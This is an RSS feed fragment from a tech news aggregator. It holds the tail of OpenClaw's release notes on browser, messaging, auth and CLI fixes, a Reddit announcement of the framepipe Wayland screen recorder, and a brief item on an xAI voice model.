<li>Browser/downloads: seed managed Chrome profiles with OpenClaw download prefs and capture unmanaged click-triggered downloads under the guarded downloads directory, while explicit download waiters still own their target file. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4242367248" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64558" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64558/hovercard" href="https://github.com/openclaw/openclaw/pull/64558">#64558</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Pearcekieser/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Pearcekieser">@Pearcekieser</a>.</li>
<li>Browser/Chrome: stop passing redundant <code>--disable-setuid-sandbox</code> when <code>browser.noSandbox</code> is enabled; <code>--no-sandbox</code> remains the effective sandbox opt-out. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279830525" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67939" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67939/hovercard" href="https://github.com/openclaw/openclaw/pull/67939">#67939</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sebykrueger/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sebykrueger">@sebykrueger</a>.</li>
<li>Browser/client: stop telling agents to permanently avoid the browser after transient timeout or cancellation failures; keep the no-retry hint for persistent unavailable/rate-limit cases. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076448290" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46505" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46505/hovercard" href="https://github.com/openclaw/openclaw/pull/46505">#46505</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jriff/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jriff">@jriff</a>.</li>
<li>Browser/aria snapshots: bind <code>format=aria</code> <code>axN</code> refs to live DOM nodes through backend DOM ids when Playwright is available, so follow-up browser actions can use those refs without timing out. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4217034518" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62434" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62434/hovercard" href="https://github.com/openclaw/openclaw/pull/62434">#62434</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MrKipler/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MrKipler">@MrKipler</a>.</li>
<li>Telegram: prevent duplicate in-process long pollers for the same bot token and add clearer <code>getUpdates</code> conflict diagnostics for external duplicate pollers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4158101646" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56230" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56230/hovercard" href="https://github.com/openclaw/openclaw/issues/56230">#56230</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Co-Messi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Co-Messi">@Co-Messi</a>.</li>
<li>Browser/Linux: detect Chromium-based installs under <code>/opt/google</code>, <code>/opt/brave.com</code>, <code>/usr/lib/chromium</code>, and <code>/usr/lib/chromium-browser</code> before asking users to set <code>browser.executablePath</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085382761" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48563" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48563/hovercard" href="https://github.com/openclaw/openclaw/pull/48563">#48563</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lupuletic/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lupuletic">@lupuletic</a>.</li>
<li>Sessions/browser: close tracked browser tabs when idle, daily, <code>/new</code>, or <code>/reset</code> session rollover archives the previous transcript, preventing tabs from leaking past the old session. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jakozloski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jakozloski">@jakozloski</a>.</li>
<li>Sessions/forking: fall back to transcript-estimated parent token counts when cached totals are stale or missing, so oversized thread forks start fresh instead of cloning the full parent transcript. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jalehman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jalehman">@jalehman</a>.</li>
<li>OpenAI/Codex: send Codex Responses system prompts through top-level <code>instructions</code> while preserving the existing native Codex payload controls.</li>
<li>MCP/CLI: retire bundled MCP runtimes at the end of one-shot <code>openclaw agent</code> and <code>openclaw infer model run</code> gateway/local executions, so repeated scripted runs do not accumulate stdio MCP child processes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327469009" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71457" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71457/hovercard" href="https://github.com/openclaw/openclaw/issues/71457">#71457</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/spartoviMD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/spartoviMD">@spartoviMD</a>.</li>
<li>OpenAI/Codex image generation: canonicalize legacy <code>openai-codex.baseUrl</code> values such as <code>https://chatgpt.com/backend-api</code> to the Codex Responses backend before calling <code>gpt-image-2</code>, matching the chat transport. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327474967" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71460" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71460/hovercard" href="https://github.com/openclaw/openclaw/issues/71460">#71460</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GodsBoy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GodsBoy">@GodsBoy</a>.</li>
<li>Control UI: make <code>/usage</code> use the fresh context snapshot for context percentage, and include cache-write tokens in the Usage overview cache-hit denominator. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4080148005" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47885" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47885/hovercard" href="https://github.com/openclaw/openclaw/issues/47885">#47885</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/imwyvern/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/imwyvern">@imwyvern</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ante042/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ante042">@Ante042</a>.</li>
<li>GitHub Copilot: preserve encrypted Responses reasoning item IDs during replay so Copilot can validate encrypted reasoning payloads across requests. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327393792" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71448" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71448/hovercard" href="https://github.com/openclaw/openclaw/pull/71448">#71448</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/a410979729-sys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/a410979729-sys">@a410979729-sys</a>.</li>
<li>GitHub Copilot: never rewrite connection-bound reasoning item IDs regardless of whether <code>encrypted_content</code> is present, fixing a 400 "Encrypted content item_id did not match" error with <code>gpt-5.3-codex</code> and future Codex models that fall through to the forward-compat catch-all with <code>reasoning: false</code>. Also recognize Codex-named models as reasoning-capable so they inherit the correct capability flags. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289536760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68735" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68735/hovercard" href="https://github.com/openclaw/openclaw/issues/68735">#68735</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/InvalidPandaa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/InvalidPandaa">@InvalidPandaa</a>.</li>
<li>Agents/replies: recover final-answer text when streamed assistant chunks contain only whitespace, preventing completed turns from surfacing as empty-payload errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327458962" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71454" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71454/hovercard" href="https://github.com/openclaw/openclaw/issues/71454">#71454</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327500044" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71467" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71467/hovercard" href="https://github.com/openclaw/openclaw/pull/71467">#71467</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>.</li>
<li>Feishu/TTS: transcode voice-intent MP3 and other audio replies to Ogg/Opus before sending native Feishu audio bubbles, while keeping ordinary MP3 attachments as files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206957369" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61249" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61249/hovercard" href="https://github.com/openclaw/openclaw/issues/61249">#61249</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4034320677" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/37868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/37868/hovercard" href="https://github.com/openclaw/openclaw/issues/37868">#37868</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sg1416-zg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sg1416-zg">@sg1416-zg</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ycjlb2023-peteryi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ycjlb2023-peteryi">@ycjlb2023-peteryi</a>.</li>
<li>WhatsApp/TTS: transcode MP3/WebM audio, including Microsoft Edge TTS output, to Ogg/Opus before sending PTT voice notes.</li>
<li>QQBot/TTS: honor plain <code>audioAsVoice</code> replies by synthesizing TTS to native QQ voice messages, and mark inbound voice-only messages as audio media without exposing raw voice paths to generic media context.</li>
<li>Providers/SenseAudio: add bundled SenseAudio batch audio transcription through <code>tools.media.audio</code> with <code>SENSEAUDIO_API_KEY</code> auth. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265936553" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66943" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66943/hovercard" href="https://github.com/openclaw/openclaw/pull/66943">#66943</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Fl0rencess720/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Fl0rencess720">@Fl0rencess720</a>.</li>
<li>Providers/MiniMax: let TTS use MiniMax portal OAuth and Token Plan credentials before falling back to <code>MINIMAX_API_KEY</code>, and include current TTS HD model ids. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4141517456" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55017" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55017/hovercard" href="https://github.com/openclaw/openclaw/issues/55017">#55017</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zx15210404690-hash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zx15210404690-hash">@zx15210404690-hash</a>.</li>
<li>Telegram/webhook: acknowledge validated webhook updates before running bot middleware, keeping slow agent turns from tripping Telegram delivery retries while preserving per-chat processing lanes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326997239" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71392" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71392/hovercard" href="https://github.com/openclaw/openclaw/issues/71392">#71392</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joelforsberg46-source/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joelforsberg46-source">@joelforsberg46-source</a>.</li>
<li>MCP/config reload: hot-apply <code>mcp.*</code> changes by disposing cached session MCP runtimes, and dispose bundled MCP runtimes during gateway shutdown so removed <code>mcp.servers</code> entries reap child processes promptly. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4203179674" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60656/hovercard" href="https://github.com/openclaw/openclaw/issues/60656">#60656</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xieyuanqing/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xieyuanqing">@xieyuanqing</a>.</li>
<li>Active Memory: keep silent recall sub-agent billing/auth failures out of shared auth-profile cooldown state, so a Claude CLI extra-usage rejection cannot disable normal Claude-backed turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325943036" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71284" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71284/hovercard" href="https://github.com/openclaw/openclaw/issues/71284">#71284</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327867252" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71539" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71539/hovercard" href="https://github.com/openclaw/openclaw/pull/71539">#71539</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishutdhar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishutdhar">@vishutdhar</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Auth/Claude CLI: sync refreshed Claude CLI OAuth credentials into the managed auth profile so long-running Claude CLI runs stop falling back to stale OpenClaw snapshots. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320240541" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70902" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70902/hovercard" href="https://github.com/openclaw/openclaw/pull/70902">#70902</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/starvex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/starvex">@starvex</a>.</li>
<li>Sessions: make <code>sessions_spawn(mode="session")</code> errors name usable alternatives when the current channel cannot bind subagent threads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4271801625" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67400" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67400/hovercard" href="https://github.com/openclaw/openclaw/issues/67400">#67400</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4277983433" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67790" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67790/hovercard" href="https://github.com/openclaw/openclaw/pull/67790">#67790</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stainlu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stainlu">@stainlu</a>.</li>
<li>Agents/Claude CLI: pass the OpenClaw system prompt through Claude's prompt-file flag so Windows runs avoid argv length failures without changing system prompt semantics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292748556" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69158" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69158/hovercard" href="https://github.com/openclaw/openclaw/issues/69158">#69158</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293340040" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69211" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69211/hovercard" href="https://github.com/openclaw/openclaw/pull/69211">#69211</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/skylee-01/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/skylee-01">@skylee-01</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cassioanorte/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cassioanorte">@cassioanorte</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Syu0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Syu0">@Syu0</a>, and @Stache73.</li>
<li>Agents/CLI sessions: bind <code>google-gemini-cli</code> session auth-epoch to the Google account identity in <code>~/.gemini/oauth_creds.json</code>, so Gemini-backed agents resume their conversation after gateway restart instead of minting a fresh session, and stale bindings are invalidated when the authenticated Google account changes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321086277" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70973" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70973/hovercard" href="https://github.com/openclaw/openclaw/issues/70973">#70973</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4322606915" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71076" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71076/hovercard" href="https://github.com/openclaw/openclaw/pull/71076">#71076</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</li>
<li>Slack: stop treating user mentions in assistant-authored message edit blocks as sender attribution, preventing edited bot messages from spoofing a mentioned DM user. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328906494" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71700" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71700/hovercard" href="https://github.com/openclaw/openclaw/pull/71700">#71700</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex: consume unauthorized bound conversation inbound claims before they can fall through to other claim handlers or enqueue Codex turns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328907337" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71702" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71702/hovercard" href="https://github.com/openclaw/openclaw/pull/71702">#71702</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex media understanding: require approval-checked app-server image turns while explicitly declining tool, file, permission, and elicitation approval requests for the bounded image worker. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328907702" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71703" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71703/hovercard" href="https://github.com/openclaw/openclaw/pull/71703">#71703</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/Claude CLI: allow large live <code>stream-json</code> JSONL lines up to the existing per-turn raw limit, preventing large Telegram, WebChat, MCP, and image turns from aborting on the old stdout buffer cap. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329383401" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71793" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71793/hovercard" href="https://github.com/openclaw/openclaw/issues/71793">#71793</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4322675128" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71080" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71080/hovercard" href="https://github.com/openclaw/openclaw/issues/71080">#71080</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318647707" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70766" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70766/hovercard" href="https://github.com/openclaw/openclaw/issues/70766">#70766</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329830196" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71897" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71897/hovercard" href="https://github.com/openclaw/openclaw/pull/71897">#71897</a>) Thanks @chacher86, @shivamgrover21, and @tpjordan.</li>
<li>Agents/Claude CLI: unwrap nested Claude result envelopes in CLI JSON output so delegated agent responses surface as final text instead of raw result JSON. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264813860" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66819" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66819/hovercard" href="https://github.com/openclaw/openclaw/pull/66819">#66819</a>) Thanks @mraleko.</li>
<li>Agents/Claude CLI: apply the configured 1M context window override to eligible Claude CLI Opus and Sonnet models when <code>context1m</code> is enabled. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319842892" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70863" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70863/hovercard" href="https://github.com/openclaw/openclaw/pull/70863">#70863</a>) Thanks @bidadh.</li>
<li>Models/status: report fresh Claude CLI native auth instead of stale stored <code>anthropic:claude-cli</code> profile expiry when local credentials are current. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325517974" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71256" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71256/hovercard" href="https://github.com/openclaw/openclaw/issues/71256">#71256</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326550173" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71332" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71332/hovercard" href="https://github.com/openclaw/openclaw/pull/71332">#71332</a>) Thanks @matthiasjanke and @neeravmakwana.</li>
<li>CLI backends: compact OpenClaw transcripts after over-budget CLI turns and reseed fresh CLI sessions from the compacted transcript instead of stale external resume state. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285899710" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68329" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68329/hovercard" href="https://github.com/openclaw/openclaw/issues/68329">#68329</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329888680" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71916" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71916/hovercard" href="https://github.com/openclaw/openclaw/pull/71916">#71916</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Telegram: keep default tool progress messages visible when answer preview streaming is disabled. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329509796" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71825" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71825/hovercard" href="https://github.com/openclaw/openclaw/pull/71825">#71825</a>) Thanks @VACInc.</li>
<li>Configure/models: clear deselected model fallbacks when updating the model picker allowlist, including provider-scoped setup flows. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328198274" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71596" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71596/hovercard" href="https://github.com/openclaw/openclaw/pull/71596">#71596</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rubencu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rubencu">@rubencu</a>.</li>
<li>Agents/streaming: strip namespaced <code>&lt;antml:thinking&gt;</code> reasoning tags from streamed assistant replies before user-visible text is emitted. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4294779031" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69288" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69288/hovercard" href="https://github.com/openclaw/openclaw/pull/69288">#69288</a>) Thanks @xialonglee.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Release v0.1.0 of framepipe - a zero-copy gpu accelerated screen recorder for wayland]]></title>
<description><![CDATA[hey, The first release of framepipe v0.1.0 is out now. I'll keep this short:  Supports xdg-desktop-portal (pipewire) and drm-kms capture. Supports cursor composition with custom sprites. Supports custom backgrounds and zoom. Supports QSV, VAAPI and CPU encoding. H264, H265, and AV1 support. A sim...]]></description>
<link>https://tsecurity.de/de/3464939/linux-tipps/release-v010-of-framepipe-a-zero-copy-gpu-accelerated-screen-recorder-for-wayland/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3464939/linux-tipps/release-v010-of-framepipe-a-zero-copy-gpu-accelerated-screen-recorder-for-wayland/</guid>
<pubDate>Sun, 26 Apr 2026 03:52:34 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>hey,</p> <p>The first release of framepipe v0.1.0 is out now.</p> <p>I'll keep this short:</p> <ol> <li>Supports xdg-desktop-portal (pipewire) and drm-kms capture.</li> <li>Supports cursor composition with custom sprites.</li> <li>Supports custom backgrounds and zoom.</li> <li>Supports QSV, VAAPI and CPU encoding.</li> <li>H264, H265, and AV1 support.</li> <li>A simple iced based gui with realtime embedded preview.</li> <li>Supports cursor smoothing, and smearing.</li> <li>Supports bt601, bt709, bt2020 colorimetery and partial hdr10/hdr/sdr.</li> <li>Sane quality presets and profiles.</li> </ol> <p>would appreciate any feedback. thank you.</p> <p><a href="https://github.com/martian0x80/framepipe/">https://github.com/martian0x80/framepipe/</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/garamgaramsamose"> /u/garamgaramsamose </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1svjvq4/release_v010_of_framepipe_a_zerocopy_gpu/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1svjvq4/release_v010_of_framepipe_a_zerocopy_gpu/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[xAI Launches grok-voice-think-fast-1.0: Topping τ-voice Bench at 67.3%, Outperforming Gemini, GPT Realtime, and More]]></title>
<description><![CDATA[The new flagship voice model outperforms Gemini, GPT Realtime, and its own predecessor across retail, airline, and telecom workflows
The post xAI Launches grok-voice-think-fast-1.0: Topping τ-voice Bench at 67.3%, Outperforming Gemini, GPT Realtime, and More appeared first on MarkTechPost.]]></description>
<link>https://tsecurity.de/de/3464794/ai-nachrichten/xai-launches-grok-voice-think-fast-10-topping-voice-bench-at-673-outperforming-gemini-gpt-realtime-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3464794/ai-nachrichten/xai-launches-grok-voice-think-fast-10-topping-voice-bench-at-673-outperforming-gemini-gpt-realtime-and-more/</guid>
<pubDate>Sun, 26 Apr 2026 01:02:17 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The new flagship voice model outperforms Gemini, GPT Realtime, and its own predecessor across retail, airline, and telecom workflows</p>
